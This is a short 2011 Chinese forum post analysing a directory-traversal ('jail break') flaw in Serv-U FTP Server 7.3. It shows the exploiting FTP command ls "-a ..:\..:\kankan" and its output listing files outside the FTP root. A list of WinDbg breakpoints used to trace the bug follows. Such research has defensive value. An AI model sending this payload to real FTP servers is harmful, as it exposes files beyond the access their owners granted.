-
-
[原创]Serv-U FTP Server Jail Break 0day 分析
-
发表于:
2011-12-3 17:21
7799
-
[原创]Serv-U FTP Server Jail Break 0day 分析
Serv-U FTP Server Jail Break 0day 分析
Author: instruder of Code Audit Labs of vulnhunt.com
测试版本Serv-U FTP Server v7.3
测试ftp根目录 c:\testftp
测试命令
ftp> ls "-a ..:\..:\kankan"
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
.
..
1.txt
upgrade_cache.cfg
226 Transfer complete. 33 bytes transferred. 2.01 KB/sec.
ftp: 收到 33 字节,用时 0.06秒 0.58千字节/秒。
0 e 1004d8ea 0001 (0001) 0:**** Serv_U_10000000!CSUString::MakeLower+0x4d31 ".if(1){db poi(edi+0x10);gc}"
1 e 1004bae1 0001 (0001) 0:**** Serv_U_10000000!CSUString::MakeLower+0x2f28
2 e 1005e048 0001 (0001) 0:**** Serv_U_10000000!CSUString::MakeFullPath+0x17c
4 e 1004ba87 0001 (0001) 0:**** Serv_U_10000000!CSUString::MakeLower+0x2ece
5 e 1004d553 0001 (0001) 0:**** Serv_U_10000000!CSUString::MakeLower+0x499a
6 e 71a2676f 0001 (0001) 0:**** WS2_32!recv ".if(1){db poi(esp+8);gc}"
7 e 1005dfc8 0001 (0001) 0:**** Serv_U_10000000!CSUString::MakeFullPath+0xfc ".if(1){.echo buildpath;db poi(eax+4)}"
9 e 71a24c27 0001 (0001) 0:**** WS2_32!send ".if(1){db poi(esp+8);kb;gc}"
12 e 1005e325 0001 (0001) 0:**** Serv_U_10000000!CSUString::MakeFullPath+0x459 ".if(1){db poi(ecx)}"
16 e 10064b55 0001 (0001) 0:**** Serv_U_10000000!CFTPCommand::ProcessCommand+0x28 ".if(1){db poi(poi(esp)+4)}"
17 e 10070c41 0001 (0001) 0:**** Serv_U_10000000!CFTPCmdLIST::ProcessCommand+0x66 ".if(1){db poi(poi([esp+4])+4)}"
19 e 1005737b 0001 (0001) 0:**** Serv_U_10000000!SeparateLines+0x9da ".if(1){db poi(eax+4)}"
20 e 1005e7e6 0001 (0001) 0:**** Serv_U_10000000!CMibInternetConnection::GetIpAddr+0x202 ".if(1){db poi(poi(esp)+4)}"
21 e 1005eb54 0001 (0001) 0:**** Serv_U_10000000!CMibInternetConnection::GetIpAddr+0x570 ".if(1){db poi(poi(esp)+4)}"
24 e 1005ea5d 0001 (0001) 0:**** Serv_U_10000000!CMibInternetConnection::GetIpAddr+0x479 ".if(1){db poi(ebp-10)}"
25 e 10057373 0001 (0001) 0:**** Serv_U_10000000!SeparateLines+0x9d2 ".if(1){db poi(poi(esp)+4);db poi(poi(esp+4)+4)}"
27 e 100575ab 0001 (0001) 0:**** Serv_U_10000000!SeparateLines+0xc0a
32 e 10057136 0001 (0001) 0:**** Serv_U_10000000!SeparateLines+0x795 ".if(1){db poi(eax+4)}"
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)